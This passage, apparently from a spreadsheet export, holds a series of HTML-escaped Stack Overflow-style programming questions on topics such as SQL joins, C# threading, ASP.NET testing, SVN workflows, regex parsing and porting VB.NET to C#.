&lt;li&gt;&lt;p&gt;Problems with web.xml creating a HTTP Status 500 error - &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
  &lt;p&gt;The server encountered an internal
  error () that prevented it from
  fulfilling this request&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;, the tutorial says: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"Create a new Servlet Web application
  as usual, add a
  "com.firstStepsServlet" package and
  put the resource and application
  classes in."&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This means that your fully qualified name for your class &lt;strong&gt;FirstStepsApplication&lt;/strong&gt; is &lt;strong&gt;com.firstStepsServlet.FirstStepsApplication&lt;/strong&gt;, so we had to alter web.xml to refer to the correct class e.g:&lt;/p&gt;
&lt;p&gt;original:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;param-value&amp;gt;
         firstStepsServlet.FirstStepsApplication
&amp;lt;/param-value&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;should be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;param-value&amp;gt;
         com.firstStepsServlet.FirstStepsApplication
&amp;lt;/param-value&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I was under the impression that the concepts of REST were supposed to be much simpler than SOAP - but it seems just as bad if not more complicated - don't get it at all! grrrr&lt;/p&gt;
&lt;p&gt;Any good links - much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fetching only rows that match all entries in a joined table (SQL)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following five tables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ISP&lt;/li&gt;
&lt;li&gt;Product&lt;/li&gt;
&lt;li&gt;Connection&lt;/li&gt;
&lt;li&gt;AddOn&lt;/li&gt;
&lt;li&gt;AddOn/Product (pivot table for many-to-many relationship).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each Product is linked to an ISP, each Connection is listed to a Product. Each product can have a number of add-ons, through the use of the pivot table (which simply has 2 fields, one for the product ID and one for the AddOn ID).&lt;/p&gt;
&lt;p&gt;The result I am interested in is each connection with the addons listed (I am making use of MySQL's GROUP_CONCAT for this, to make a comma-separated list of the addon's &lt;em&gt;name&lt;/em&gt; field). This works fine as is, the query looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT i.name AS ispname, i.img_link, c.download, c.upload, c.monthly_price, c.link, 
GROUP_CONCAT(a.name) AS addons, SUM(pa.monthly_fee) AS addon_price
FROM isp i JOIN product p ON i.id = p.isp_id
JOIN `connection` c ON p.id = c.product_id LEFT JOIN product_addon pa ON pa.product_id = p.id AND pa.forced = 0
LEFT JOIN addon a ON pa.addon_id = a.id GROUP BY c.id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using LEFT JOINS as it is possible for products to have no addons at all.&lt;/p&gt;
&lt;p&gt;My problem is that it is possible to select some addons that listed connections MUST have, presented as a list of addon IDs, like (1,14,237). If I put it in as an additional condition in the JOIN statements (*AND pa.addon_id IN (...)*), it will return all connections that have just one of the listed addons, but not necessarily all of them.&lt;/p&gt;
&lt;p&gt;Is there some way to return all connections that as a &lt;strong&gt;minimum&lt;/strong&gt; have all the addons (they can have additional as well) via SQL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I print different bands depending on the value of a Field in a DataSet using FastReport?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a product's dataset and I want to have distinct bands for each type of product, something like, if the product is a fruit, print it's weight, if the product is a car print its color and so on.&lt;/p&gt;
&lt;p&gt;And I want to let my users customize it, so each band for each type o product will be perfect.&lt;/p&gt;
&lt;p&gt;My DataSet have all fields from all type of products and I have a field which determines the product type of the actual record.&lt;/p&gt;
&lt;p&gt;Is there some easy to way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing web context to a 'service' in ASP MVC app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to work out a way of passing the web current http context to a service class (or initialising the class with a reference to it). I am doing this to abstract the rest of the app away from needing to know anything about the http context. &lt;/p&gt;
&lt;p&gt;I also want the service to be testable using TDD, probably using one of the Mockable frameworks. Hence it would be preferable to use an interface rather than an actual class.&lt;/p&gt;
&lt;p&gt;An example of what I'd like to achieve:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class WebInstanceService 
{
    private IHttpContext _Context;        
    public WebInstanceService( ... , IHttpContext HttpContext )
    {
        ....
        _Context = HttpContext;
    }
    // Methods...
    public string GetInstanceVariable(string VariableName)
    {
         return _Context.Current.Session[VariableName];
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One of the main issues I have is that there is no IHttpContext, the .net http context is a subclass of an abstract class which can't be mocked (easily?).&lt;/p&gt;
&lt;p&gt;Another issue is that I can't initialise global instances of the class as then the context won't be relevant for most requests. &lt;/p&gt;
&lt;p&gt;I could make the class static, and require the Context to be passed to each function as it is called i.e.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static string GetInstanceVariable(string VariableName, HttpContext Context) 
{ ... }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this doesn't make the class any easier to test, I still need to create an HttpContext and additionally any non-web-aware services which want to use this class suddenly need to be able to retrieve the Context requiring them to be closely coupled to the web server - the whole reason for wanting to create this class in the first place.&lt;/p&gt;
&lt;p&gt;I'm open to ALL suggestions - particularly those which people know facilitate easy tdd testing. &lt;strong&gt;How would people suggest I tackle this problem?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Copying" a Tree from SVN into a local repository and merging it back afterwards</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SVN Repository at my main PC, to which only I have access. I also have a Laptop, and I don't want to lose SVN Functionality when I am not connected to my PC. So at the moment, I simply copy accross the whole Repository to the Laptop and copy it back.&lt;/p&gt;
&lt;p&gt;That works well of course (I am the only developer, so there is no access to the repo when I am not in anyway), but it is somewhat tedious to do every time.&lt;/p&gt;
&lt;p&gt;I wonder if there is a way to check out a Directory from SVN and store it in a (new) repository on the Laptop, work against that, and then merge that repository with the main one later. (Yes, I know that this would be a good case for distributed systems a la git or Mercurial, but I don't want to lose VisualSVN/TortoiseSVN).&lt;/p&gt;
&lt;p&gt;I am not really sure what I am looking for, but I guess I am looking for branching and merging between two repositories: Branch the tree off repo1 into repo2, then merge it back. The caveat here: I'd like to keep the history from repo2. So if I made 10 commits against repo2, I'd like to transfer those 10 commits into repo1 as well, so that I am still able to go back.&lt;/p&gt;
&lt;p&gt;Is that even possible, or am I better off still copying the whole repository every time? (It sits in a VM anyway, which means that I copy the whole VM every time).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should methods updating database tables be unit tested?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that is database intensive.  Most of the applications methods are updating data in a database.  Some calls are wrappers to stored procedures while others perform database updates in-code using 3rd party APIs.  &lt;/p&gt;
&lt;p&gt;What should I be testing in my unit tests?  Should I...&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Test that each method completes without throwing an exception -or-&lt;/li&gt;
&lt;li&gt;Validate the data in the database after each test to make sure the state of data is as expected&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;My initial thought is #2 but my concern is that I would be writing a bunch of &lt;em&gt;framework code&lt;/em&gt; to go along with my unit tests.  I read that you shouldn't write a bunch of framework code for unit testing.&lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; What I mean by framework is writing a ton of other code that serves as a &lt;em&gt;library&lt;/em&gt; to the unit testing code...not a third party framework.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to disable/override the default style for disabled WebControls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;that one has been nagging me ever since I dabbled in web developpement; is there a way for this?  Could I override that style and rely on some other mean to inform my users that that control can't be ineracted with?&lt;/p&gt;
&lt;p&gt;My problem is that the graying of RadioButton- and CheckBox-Lists' labels makes them unreadable.&lt;/p&gt;
&lt;p&gt;I could always replace the disabled TextBoxes with Labels styled/themed to look like TextBoxes, but that'd be more invasive...&lt;/p&gt;
&lt;p&gt;[EDIT] Ok, sorry; that's not a solution; TextBoxes already have the "Readonly" option, which means they look the way I want them to, even when locked from user-input; the problem rather lies with IList Controls (RadioButtonLists and CheckBoxLists.)&lt;/p&gt;
&lt;p&gt;As ever, thanks for your time!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL - how to SHOW PROCESSLIST only with current user's processes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in MySQL 5 to show only the current user's processes(queries)?&lt;/p&gt;
&lt;p&gt;The user has the &lt;code&gt;PROCESS&lt;/code&gt; privilege, therefore &lt;code&gt;SHOW PROCESSLIST&lt;/code&gt; displays running processes of all users. According to the documentation, &lt;code&gt;SHOW PROCESSLIST&lt;/code&gt; does not allow any kind of &lt;code&gt;WHERE&lt;/code&gt; syntax, nor did I manage to make it into a subquery.&lt;/p&gt;
&lt;p&gt;Of course, I could simply send the query, e.g. in a PHP script, and go through the results in a loop, discarding everything that's not mine, but it seems rather inefficient. Changing the user privileges is not feasible.&lt;/p&gt;
&lt;p&gt;Are there any other ways? Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">contextswitchdeadlock </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whilst debugging my program in VS 2008 I have come across the following error:&lt;/p&gt;
&lt;p&gt;The CLR has been unable to transition from COM context 0x34fc1a0 to COM context 0x34fc258 for 60 seconds. The thread that owns the destination context/apartment is most likely either doing a non pumping wait or processing a very long running operation without pumping Windows messages. This situation generally has a negative performance impact and may even lead to the application becoming non responsive or memory usage accumulating continually over time. To avoid this &lt;/p&gt;
&lt;p&gt;It appears to be deadlocking even though the code only contains a simple C# timer: See Snippet Below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private void RequestWork()
    {
        // The timer will be re-intialised if there are still no wating jobs in the database
        StopTimer();
        // assign all the threads some work
        InitialiseTimer();
    }
    /// &amp;lt;summary&amp;gt;
    /// Initialise a timer with a timer interval configured from app.config. Enable the timer and 
    /// register an appropriate event handler
    /// &amp;lt;/summary&amp;gt;
    private void InitialiseTimer()
    {
        if (m_Timer == null)
        {
            // look up the default backoff time from the config
            string backOffInt = ConfigurationSettings.AppSettings["BackOffInterval"];
            int backoffInterval = 1000;
            m_Timer = new System.Timers.Timer();
            // set the timer interval to 5 seconds
            m_Timer.Interval = backoffInterval;
            m_Timer.Elapsed += new ElapsedEventHandler(m_Timer_Elapsed);
        }
        m_Timer.Enabled = true;
    }
    private void StopTimer()
    {
        if (m_Timer != null)
        {
            m_Timer.Enabled = false;
        }
    }
    void m_Timer_Elapsed(object p_Sender, ElapsedEventArgs p_E)
    {
        RequestWork();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As far as I know the timer should run, elapse and then initialise again, I can see no local reason for a deadlock.&lt;/p&gt;
&lt;p&gt;I am aware of how to turn this error msg off but feel that this is not a solution, instead it is masking the problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using an anchor as a javascript action, what should the link be?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen (and used) code to have a link spawn a javascript action many times in my life, but I've never come to a firm conclusion on if the href attribute should be blank or #.  Do you have any preference one way or the other, and if so, why?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="" onclick="javascript: DoSomething();"&amp;gt;linky&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="#" onclick="javascript: DoSomething();"&amp;gt;linky&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Uninstall Without MSI File</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often get a problem with Windows Installer trying to uninstall a package, but it complains that&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The feature you are trying to use is on a network resource that is unavailable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is there a known means of uninstalling such packages when the original MSI is simply not available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which JavaScript library you recommend to use with Java EE + Struts + iBatis?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which JavaScript library you recommend to use with Java EE + Struts + iBatis ?
Something like Ext JS, Dojo, frameworks that can be easily integrated with Struts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Opening a folder in explorer and selecting a file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to open a folder in explorer with a file selected.&lt;/p&gt;
&lt;p&gt;The following code produces a file not found exception: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Diagnostics.Process.Start(
    "explorer.exe /select," 
    + listView1.SelectedItems[0].SubItems[1].Text + "\\" 
    + listView1.SelectedItems[0].Text);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I get this command to execute in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server Alerts - Best Practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What SQL Server Alerts do you always setup for every database? What do you always monitor regardless of the database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Problem setting label text on another form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a very new C# programmer and I am trying to make a kiosk application more accessible by increasing the size of fonts.  No problem on the main form.  I'm having a problem replacing messageboxes (for which I believe there is no way to increase the font size) with small forms with the same message.&lt;/p&gt;
&lt;p&gt;This is where I'm running into the problem.  The main form can't "see" the error form and its label to set the text.  I have tried setting a property for the private label on the error form, but it's still not working.&lt;/p&gt;
&lt;p&gt;I would be very grateful for any assistance. I have been trying to apply what I've learned in reading several threads from various C# sources.&lt;/p&gt;
&lt;p&gt;Two strange things I have noticed but am so new to C# that I don't know what they may indicate: (1) In the MainForm when I type ErrorForm. the Intellisense list of suggested code pops up but the variable LblNotCheckedInBecause does not appear on the list. (2) The compiler error says something about the LBlNotCheckedInBecause.get statement and it seems like to me it should be refering to the set statement since I'm trying to set that value.&lt;/p&gt;
&lt;p&gt;Here are the parts of the code that I believe are involved and if any additional code is needed, just let me know:&lt;/p&gt;
&lt;p&gt;From the bottom of ErrorForm.Designer.cs...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private System.Windows.Forms.Panel panel1;
    private System.Windows.Forms.Label lblNotCheckedInBecause;
    public string LblNotCheckedInBecause  // property I created to try to be able
                                          // to change the label
    {
        get { return this.lblNotCheckedInBecause.Text; }
        set { this.lblNotCheckedInBecause.Text = value; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From MainForm.cs...
            MessageBox.Show("You were not checked in because of the following reasons:" + sErrors); // this is what I'm trying to replace
            ErrorForm.LblNotCheckInBecause = "You were not checked in because of the following reasons:" + sErrors; // this line is causing a compiler error&lt;/p&gt;
&lt;p&gt;Compiler error...
Error   1	An object reference is required for the nonstatic field, method, or property 'LogisticsKiosk.ErrorForm.LblNotCheckInBecause.get'	C:\Documents and Settings\My Documents\Visual Studio 2005\Projects\LogisticsKiosk\Forms\MainForm.cs	107	17	LogisticsKiosk&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are goto and destructors compatible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This code leads to undefined behavior:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
void some_func() {
  goto undefined;
  {
    T x = T();
    undefined:
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The constructor is not called. &lt;/p&gt;
&lt;p&gt;But what about this code? Will the destructor of x be called? I think it will be, but I want to be sure. :)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
void some_func() {
  {
    T x = T();
    goto out;
  }
  out:
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Implementing Rails' layout functionality with Apache Tiles</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody tried duplicating Ruby on Rails' layout functionality with Apache Tiles 2 ? I'm trying to integrate Tiles 2 with Spring.  I have a previously written custom view resolver for the Spring framework that does this quite nicely, but I'm upgrading to Spring Webflow 2 and I need to be able to integrate Tiles 2&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL Composite PK with Nullable FKs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First off, let me preface this question by stating that I'm really a pretty terrible data modeler.  I know only enough to be dangerous.&lt;/p&gt;
&lt;p&gt;The table I'm building has four foreign keys, two of which reference the same table.  Here's the create statement for that table.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE  TABLE IF NOT EXISTS `abnr`.`reputation_event_log` (
  `id` INT NOT NULL AUTO_INCREMENT ,
  `reputation_event_id` INT NULL ,
  `giver_user_id` INT NULL ,
  `receiver_user_id` INT NULL ,
  `review_id` INT NULL ,
  `giver_point_value` SMALLINT NULL DEFAULT 0 ,
  `receiver_point_value` SMALLINT NULL DEFAULT 0 ,
  `created_at` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ,
  PRIMARY KEY (`id`) ,
  INDEX `fk_reputation_log_user` (`giver_user_id` ASC) ,
  INDEX `fk_reputation_log_user1` (`receiver_user_id` ASC) ,
  INDEX `fk_reputation_log_review` (`review_id` ASC) ,
  INDEX `fk_reputation_log_reputation_event` (`reputation_event_id` ASC) ,
  CONSTRAINT `fk_reputation_log_user`
    FOREIGN KEY (`giver_user_id` )
    REFERENCES `abnr`.`user` (`id` )
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_reputation_log_user1`
    FOREIGN KEY (`receiver_user_id` )
    REFERENCES `abnr`.`user` (`id` )
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_reputation_log_review`
    FOREIGN KEY (`review_id` )
    REFERENCES `abnr`.`review` (`id` )
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_reputation_log_reputation_event`
    FOREIGN KEY (`reputation_event_id` )
    REFERENCES `abnr`.`reputation_event` (`id` )
    ON DELETE NO ACTION
    ON UPDATE NO ACTION)
ENGINE = InnoDB
DEFAULT CHARACTER SET = utf8
COLLATE = utf8_general_ci;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The indexes I'm concerned with for this post are &lt;code&gt;fk_reputation_log_user&lt;/code&gt; and &lt;code&gt;fk_reputation_log_user1&lt;/code&gt;.  Every reputation event has a giver, but only some have a receiver.  I would &lt;em&gt;like&lt;/em&gt; this FK to be nullable, but I don't know how to do that, or if it's even "allowed".&lt;/p&gt;
&lt;p&gt;I also toyed with the idea of making all FK columns part of the primary key to have database-level protection against duplicate log entries - but that won't work since PK columns have to be NOT NULL.&lt;/p&gt;
&lt;p&gt;If you need more detail, please state that in the comments.  Thanks!&lt;/p&gt;
&lt;p&gt;(Yes, this is for a reputation system not too dissimilar from what SO has)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# How to replace Microsoft's Smart Quotes with straight quotation marks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My post below asked what the curly quotation marks were and why my app wouldn't work with them, my question now is how can I replace them when my program comes across them, how can I do this in C#? Are they special characters?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/334119/curly-quotation-marks-vs-square-quotation-marks-what-gives"&gt;curly-quotation-marks-vs-square-quotation-marks-what-gives&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In C# what is the recommended way of passing data between 2 threads?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have my main GUI thread, and a second thread running inside it's own ApplicationContext (to keep it alive, even when there is no work to be done). I want to call a method on my 2nd thread from my GUI thread, but if I just call thread.Method(); it seems to be running on my main GUI thread and causes my GUI to become unresponsive. What is the best way to call methods on different threads?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
What I'm really looking to do here is communicate between 2 threads, not communicate with a GUI. The GUI just happens to be one of the threads that will need to communicate with my 2nd thread.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update #2:&lt;/strong&gt;
Ok, I must really be missing something. I created an event and a delegate and had my worker thread subscribe to the event. But when I call Invoke(MyEvent); from my GUI thread the work that the worker thread does ends up being on the GUI thread and hangs the GUI thread until it's done processing. Is what I'm trying to do even possible, without polling on a static object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ with FoxPro?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a reasonable way to access FoxPro databases using LINQ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>nHibernate slow performance on a hosted website</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a webapp being hosted with a public hosting company, the site is not live yet, and I am still doing some testing with it. I am using nHibernate with Windsor Castle Container for dependency injection and the site seems to be responding very slow from time to time.  I've contacted support but they said that it's my app not their servers. Has anyone had similar performance issues with ORM based sites when being hosted at the public hosting companies?&lt;/p&gt;
&lt;p&gt;Also, what hosting company would you recommend for hosting websites? I tried godaddy but couldn't use them 'cause they don't allow running website in full trust which is apparently required for nHibernate.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I configured nHibernate using xml configuration files, opening sessions in the following way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using (ISession session = _sessionManager.OpenSession())
{         
ICriteria crit = session.CreateCriteria(typeof(Content));
   return crit.List();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also in the &lt;code&gt;Application_Start&lt;/code&gt; I have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static WindsorContainer container;
if (container == null)
   {
     container = new WindsorContainer(new XmlInterpreter(filePath));
      Application[Constant.CastleWindsorAppKey] = container;
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Question: VB.net coding standard regarding declaring variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen some variable declare in VB.net in several way like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print("dim _Foo as string");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and 
    print("dim m_Foo as string");
and
    print("dim foo as string");&lt;/p&gt;
&lt;p&gt;I will like to know what's the standard for VB.net coding.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I restrict the number of records to be processed in an SSIS package?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with 7M records I want to trim down to 10k for dev.  I tried a delete, but the whole world was nearly overpowered by the transaction log size, so I truncated the table.&lt;/p&gt;
&lt;p&gt;Now I wish to insert 10k records from the original table, into my dev table, but it has a identity column, and many, many other columns, so I'd thought I'd try SSIS (through the wizard), which handles the identity nicely, but gives me no place to edit a query.  So I quickly made a view with a top clause, and changed the RowSet property of the source to the view.  Now everything fails because nothing sees the view, although I copied and pasted the view name from my create view statement, which fails a second time because, lo, the view actually does exist.  &lt;/p&gt;
&lt;p&gt;Does SSIS define which DB objects are used when a package is created, which would exclude the new view, and if so, how can I refresh that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Showcasing Flex - Tour de Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I ran across &lt;a href="http://flex.org/tour" rel="nofollow"&gt;Tour de Flex&lt;/a&gt; a couple days ago. It's a demo that showcases all the Flex controls, with cross-references to source and references. It's a great way to get an idea of the resources available, and how to use them.&lt;/p&gt;
&lt;p&gt;Not a question, but a useful resource since I've seen a number of Flex/Actionscript questions here.&lt;/p&gt;
&lt;p&gt;(Note that I've preflagged all the no-credit tags I can think of already. Pile on more if you can think of any.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone designmode support</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone knows if Safari on the iPhone and iPod touch supports iFrame in design mode and if so, how I can enable it? I have tried following ways, but none work (but it works on my PC):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;theIframe.contentWindow.document.body.contentEditable = true;
theIframe.contentWindow.document.designMode = 'on';
theIframe.contentDocument.designMode = "on";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing XML with REGEX in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given the below XML snippet I need to get a list of name/value pairs for each child under DataElements. XPath or an XML parser cannot be used for reasons beyond my control so I am using regex.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;StandardDataObject xmlns="myns"&amp;gt;
  &amp;lt;DataElements&amp;gt;
    &amp;lt;EmpStatus&amp;gt;2.0&amp;lt;/EmpStatus&amp;gt;
    &amp;lt;Expenditure&amp;gt;95465.00&amp;lt;/Expenditure&amp;gt;
    &amp;lt;StaffType&amp;gt;11.A&amp;lt;/StaffType&amp;gt;
    &amp;lt;Industry&amp;gt;13&amp;lt;/Industry&amp;gt;
  &amp;lt;/DataElements&amp;gt;
  &amp;lt;InteractionElements&amp;gt;
    &amp;lt;TargetCenter&amp;gt;92f4-MPA&amp;lt;/TargetCenter&amp;gt;
    &amp;lt;Trace&amp;gt;7.19879&amp;lt;/Trace&amp;gt;
  &amp;lt;/InteractionElements&amp;gt;
&amp;lt;/StandardDataObject&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output I need is: 
    [{EmpStatus:2.0},  {Expenditure:95465.00}, {StaffType:11.A}, {Industry:13}]  &lt;/p&gt;
&lt;p&gt;The tag names under DataElements are dynamic and so cannot be expressed literally in the regex. The tag names TargetCenter and Trace are static and could be in the regex but if there is a way to avoid hardcoding that would be preferable. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"&amp;lt;([A-Za-z0-9]+?)&amp;gt;([A-Za-z0-9.]*?)&amp;lt;/"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the regex I have constructed and it has the problem that it erroneously includes {Trace:719879} in the results.  Relying on new-lines within the XML or any other apparent formatting is not an option.&lt;/p&gt;
&lt;p&gt;Below is an approximation of the Java code I am using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static final Pattern PATTERN_1 = Pattern.compile(..REGEX..);
private List&amp;lt;DataElement&amp;gt; listDataElements(CharSequence cs) {
    List&amp;lt;DataElement&amp;gt; list = new ArrayList&amp;lt;DataElement&amp;gt;();
    Matcher matcher = PATTERN_1.matcher(cs);
    while (matcher.find()) {
        list.add(new DataElement(matcher.group(1), matcher.group(2)));
    }
    return list;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I change my regex to only include data elements and ignore the rest?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Matching dashes in a URL regex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have used the following regex to get the urls from text (e.g. &lt;code&gt;"this is text http://url.com/blabla possibly some more text"&lt;/code&gt;).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'@(https?://([-\w\.]+)+(:\d+)?(/([\w/_\.]*(\?\S+)?)?)?)@'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works for all URLs but I just found out it doesn't work for URLs shortened like: &lt;code&gt;"blabla bla http://ff.im/-bEnA blabla"&lt;/code&gt; becomes &lt;code&gt;http://ff.im/&lt;/code&gt; after the match.&lt;/p&gt;
&lt;p&gt;I suspect it has to do with the dash &lt;code&gt;-&lt;/code&gt; after the slash &lt;code&gt;/&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Porting VB.NET Winforms Application to C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any 'good' resources for porting a VB.NET winforms application to C#?  I'm sure there are is software that just translates the code, but I'm looking to refactor the code at the same time.  Keeping it in its current form is problematic, since it uses some of the 'bad design' practices that VB.NET allows, and would further complicate future maintanence.  Has anyone here gone through that process, and how did you go about doing it?  Did you use a translate/refactor approach? Did you just use the end product to recreate functionality without looking at the current codebase for most of it?  What would you (collectively) recommend?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;As I was telling Grauenwolf, keeping it in its current language presents the following issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Not being able to readily add features.  VB.NET isn't a language I'm rock solid in. I do appreciate the irony of learning the language to port it over -- but future maintenance will need to account for someone who doesn't know VB.NET.&lt;/li&gt;
&lt;li&gt;The rest of the application has been ported to C# (a long time ago, in fact);  all features that we'd like to add depend on de-coupling the app (right now it's very tightly coupled).  My choices are to either refactor it in a language I'm not too familiar with, or to refactor it in a language I understand.  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To anyone who voted the question down, I'm not really sure &lt;em&gt;why&lt;/em&gt; you did;  the concern isn't whether I should leave it in VB.NET; the concern is what is the future cost of not porting it over now.  If I'm going to spare great expense in fixing it, why not go the extra step and make it maintainable for a future programmer?&lt;/p&gt;
